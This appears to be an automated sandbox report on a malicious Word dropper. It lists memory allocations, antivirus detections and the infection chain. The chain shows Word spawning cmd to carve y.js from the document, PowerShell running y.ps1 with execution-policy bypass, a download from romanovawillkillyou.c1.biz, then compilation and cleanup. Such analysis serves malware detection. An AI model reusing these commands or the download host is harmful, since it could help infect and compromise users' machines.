NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$866ae254de4cabd60a95abcc52c315.doc

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\yy.js
file	c:\Users\test22\AppData\Local\Temp\jt6a_ory.dll
file	C:\Users\test22\y.ps1

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile July 31, 2021, 1:50 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004a0 filepath: C:\Users\test22\AppData\Local\Temp\~$866ae254de4cabd60a95abcc52c315.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$866ae254de4cabd60a95abcc52c315.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
cmdline	C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" "
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1
cmdline	"C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
cmdline	powershell.exe -ep bypass -f ./y.ps1

Word document hooks document open

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\jt6a_ory.dll

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 31, 2021, 1:50 p.m.	show_type: 0 filepath_r: cmd parameters: /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt filepath: cmd	1	1
ShellExecuteExW July 31, 2021, 1:50 p.m.	show_type: 0 filepath_r: cmd parameters: /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt filepath: cmd	1	1
ShellExecuteExW July 31, 2021, 1:50 p.m.	show_type: 0 filepath_r: wscript.exe parameters: yy.js filepath: wscript.exe	1	1
ShellExecuteExW July 31, 2021, 1:50 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ep bypass -f ./y.ps1 filepath: powershell.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef60000 process_handle: 0xffffffff	1	0	0

URL downloaded by powershell script (2 events)

Data received	!
Data received	HTTP/1.1 403 Forbidden Date: Sat, 31 Jul 2021 04:50:48 GMT Server: Apache Vary: Host Last-Modified: Wed, 19 Sep 2012 23:44:43 GMT ETag: "6e-4ca169747d0c0" Accept-Ranges: bytes Content-Length: 110 Connection: close Content-Type: text/html <html><head><meta http-equiv="refresh" content="0;http://biz.nf/errors/403.html" /></head><body></body></html>

Poweshell is sending data to a remote host (2 events)

Data sent	!
Data sent	GET /index.php?user_id=417 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: romanovawillkillyou.c1.biz Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 31, 2021, 1:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd /c cd /d %USERPROFILE% && del /f /q y.*
cmdline	cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline"

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Lionic	Trojan.MSOffice.SDrop.b!c
Elastic	malicious (high confidence)
ALYac	Trojan.Downloader.DOC.Gen
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of Generik.JKVCGVL
TrendMicro-HouseCall	TROJ_FRS.VSNTGU21
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan-Dropper.MSOffice.SDrop.gen
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	DOC.Z.Agent.895425
DrWeb	W97M.Dropper.106
TrendMicro	TROJ_FRS.VSNTGU21
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.cl
Ikarus	Trojan.SuspectCRC
Microsoft	Trojan:Script/Woreflint.A!cl
TACHYON	Suspicious/W97M.Obfus.Gen.8
SentinelOne	Static AI - Malicious OLE
Fortinet	VBA/Agent.JKV!tr
AVG	Other:Malware-gen [Trj]

A command shell or script process was created by an unexpected parent process (3 events)

parent_process	winword.exe	martian_process	cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" \| findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
parent_process	powershell.exe	martian_process	cmd /c cd /d %USERPROFILE% && del /f /q y.*
parent_process	powershell.exe	martian_process	cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send July 31, 2021, 1:50 p.m.	buffer: ! socket: 1380 sent: 1	1	1
send July 31, 2021, 1:50 p.m.	buffer: GET /index.php?user_id=417 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: romanovawillkillyou.c1.biz Connection: Keep-Alive socket: 1496 sent: 325	1	325
send July 31, 2021, 1:50 p.m.	buffer: ! socket: 1380 sent: 1	1	1
URLDownloadToFileW July 31, 2021, 1:50 p.m.	url: http://romanovawillkillyou.c1.biz/index.php?user_id=417 stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\tmp3394.tmp filepath: C:\Users\test22\AppData\Local\Temp\tmp3394.tmp		2148270088

One or more non-whitelisted processes were created (12 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
parent_process	wscript.exe	martian_process	cmd /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
parent_process	wscript.exe	martian_process	powershell.exe -ep bypass -f ./y.ps1
parent_process	wscript.exe	martian_process	cmd /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" yy.js
parent_process	wscript.exe	martian_process	wscript.exe yy.js
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
parent_process	winword.exe	martian_process	cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" \| findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline"
parent_process	powershell.exe	martian_process	cmd /c cd /d %USERPROFILE% && del /f /q y.*
parent_process	powershell.exe	martian_process	cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-ep bypass				value	Attempts to bypass execution policy

The process wscript.exe wrote an executable file to disk which it then attempted to execute (3 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

ce866ae254de4cabd60a95abcc52c315.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All